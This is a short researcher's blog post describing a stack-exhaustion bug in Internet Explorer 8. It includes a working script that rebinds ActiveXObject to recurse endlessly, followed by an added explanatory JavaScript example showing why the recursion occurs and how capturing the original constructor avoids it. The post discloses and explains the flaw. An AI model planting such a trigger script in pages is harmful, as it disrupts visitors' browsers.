MSIE 8 Out Of Stack Space.

First time I saw such an error message in a browser.

It's not the same as an out-of-memory problem, but an out-of-stack-space problem. I wrote about a similar attack on MSIE 8 in March, that resulted in a persistent denial of service. This vulnerability here basically does the same but doesn't crash MSIE. There might be a better term for it of which I am not aware, but I like to call it function aliasing since that suits it the best. Interestingly, it not only works on the new XDR object found in March, but also on a regular XmlHttpRequest function inside MSIE 8. I think more is possible with this kind of attack. I might do a stack trace when I have the time, but for now here is a small sample that triggers an out-of-stack-space message in under a second, which is the fastest I have ever seen:

<script>

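// Reference to the original constructor (not used again below).
xmlhttp = ActiveXObject;

// Replace the global. Inside the function, the name ActiveXObject now
// resolves to this replacement, so every call invokes itself again.
ActiveXObject = function() {
    return new ActiveXObject("MSXML2.XMLHTTP");
}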

ping = 'hello';
xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "#", false);
xmlhttp.send(ping);

</script>
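Why the sample recurses, as an added example that is not part of the original post: the replacement looks up its own name at call time, while a wrapper that captures the original constructor first does not. `HostObject`, `aliasRecursive`, `aliasSafe`, `tryConstruct` and `demo` are hypothetical names, and the code assumes a current JavaScript engine such as Node.js, where stack exhaustion surfaces as a catchable `RangeError` instead of MSIE's message.

```javascript
// Constructed stand-in for a host constructor such as ActiveXObject (hypothetical).
function HostObject(progId) {
  this.progId = progId;
}

// Same shape as the sample in the post: the wrapper resolves the name again
// when it runs, and by then the name points at the wrapper itself.
function aliasRecursive(scope, name) {
  scope[name] = function (progId) {
    return new scope[name](progId);
  };
}

// Wrapper that captures the original constructor before rebinding the name,
// so the inner call reaches the real constructor and terminates.
function aliasSafe(scope, name) {
  const original = scope[name];
  scope[name] = function (progId) {
    return new original(progId);
  };
}

// Construct through the (possibly rebound) name and report what happened.
function tryConstruct(scope, name, progId) {
  try {
    const obj = new scope[name](progId);
    return { ok: true, progId: obj.progId };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

// Run both variants against separate scopes (constructed sample input).
function demo() {
  const broken = { HostObject: HostObject };
  aliasRecursive(broken, "HostObject");

  const wrapped = { HostObject: HostObject };
  aliasSafe(wrapped, "HostObject");

  return {
    recursive: tryConstruct(broken, "HostObject", "MSXML2.XMLHTTP"),
    safe: tryConstruct(wrapped, "HostObject", "MSXML2.XMLHTTP"),
  };
}
```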
